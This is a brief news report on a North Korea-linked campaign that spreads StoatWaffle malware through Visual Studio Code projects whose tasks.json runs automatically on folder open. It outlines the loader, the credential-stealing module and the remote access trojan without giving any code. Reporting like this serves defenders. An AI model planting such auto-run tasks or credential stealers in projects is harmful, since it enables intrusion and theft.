NORTH Korea-linked threat actors, specifically Team 8, are behind the Contagious Interview campaign that spreads StoatWaffle malware by abusing Visual Studio Code projects with an auto-run tasks[.]json. Since late 2025, the group has used the editor’s tasks[.]json to execute code when a folder is opened, downloading payloads from the web across operating systems in a stealthy, multi-stage infection chain.
A Node[.]js loader repeatedly connects to a command-and-control server to fetch additional modules, with a second downloader continuing the delivery of malware across the system. One module acts as a stealer, harvesting credentials from browsers, browser extension data, installed software details, and even macOS Keychain data, and it can access Windows data via WSL. Another module functions as a remote access trojan, enabling the attacker to run commands and obtain results.
The report attributes the discovery to findings published by NTT Security, noting that StoatWaffle represents a modular malware platform implemented in Node[.]js, with watermarked updates from WaterPlum. The article was published on 24 March 2026.